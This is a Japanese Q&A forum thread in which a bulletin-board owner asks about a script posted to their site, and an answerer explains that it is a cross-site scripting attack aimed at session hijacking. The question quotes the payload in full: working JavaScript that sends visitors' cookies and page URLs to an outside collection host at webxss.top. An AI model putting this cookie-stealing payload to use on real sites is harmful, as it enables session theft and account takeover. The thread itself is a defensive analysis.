こんにちはゲストさん。会員登録(無料)して質問・回答してみよう!

解決済みの質問

掲示板に投稿されたスクリプトについて

<script src=http://t.cn/RKELMFa></script>
と言うスクリプトが投稿されて内容を確認すると、
(function(){(new Image()).src='http://webxss.top/xss/index.php?do=api&id=UbW8hC&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://webxss.top/xss/index.php?do=keepsession&id=UbW8hC&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
と言う内容でした。
これって何か問題ありますか?
気が付くまでに2か月位放置されていました。

投稿日時 - 2017-09-09 14:02:41

QNo.9372679

困ってます

質問者が選んだベストアンサー

結論から申し上げますとコードには問題があるようです。

短縮URLの元のURLを調べてみますと、
ttp://webxss.top/xss/UbW8hC?1500436086
ということです(一部伏字)。ドメイン名で検索すると中国のサイトであることが分かりました。直接アクセスはしないことをお勧めします。

上記URLに'xss'という文字列が2回出現していることが分かります。このxssとはクロスサイトスクリプティングといい、動的なウェブサイトの脆弱性を利用した攻撃のことを指します。

ここまででも怪しい香りがプンプンします。

ソースコードが何をするのかごく簡単に説明すると、スクリプトが実行されたサイトのURLとユーザーのCookie情報を冒頭URLのサイトに送信します。

CookieとURLを取得することで、セッションハイジャックを狙っているものと推測します。セッションハイジャックは他のユーザーになりすましてウェブサイトに不正侵入することです。(詳しくは参考URL)

もし掲示板にXSS脆弱性が存在し、ユーザーが投稿したスクリプトが実行されてしまう状態であれば、掲示板にアクセスしたユーザーの情報が盗み取られて送信されていたものと思われます。

その掲示板はユーザーの投稿をきちんとエスケープして表示していたため、スクリプトは実行されていません。
ただ、実行したらそれなりのことが起こるので削除しておいたほうがよいと思います。

参考URL:http://sawara.me/php/2348/

投稿日時 - 2017-09-09 15:35:33

お礼

少し焦って質問したので、すごくアバウトな質問でしたが、詳しく説明頂き大変ありがとうございます。
どことは書けませんが、この掲示板はXSSに対する対策がされていませんでした。もう手遅れかもわかりませんが、セッションをすべてクリアしておきたいと思います。
ありがとうございました。

投稿日時 - 2017-09-10 11:46:20

ANo.1

このQ&Aは役に立ちましたか?

0人が「このQ&Aが役に立った」と投票しています

回答(1)

あなたにオススメの質問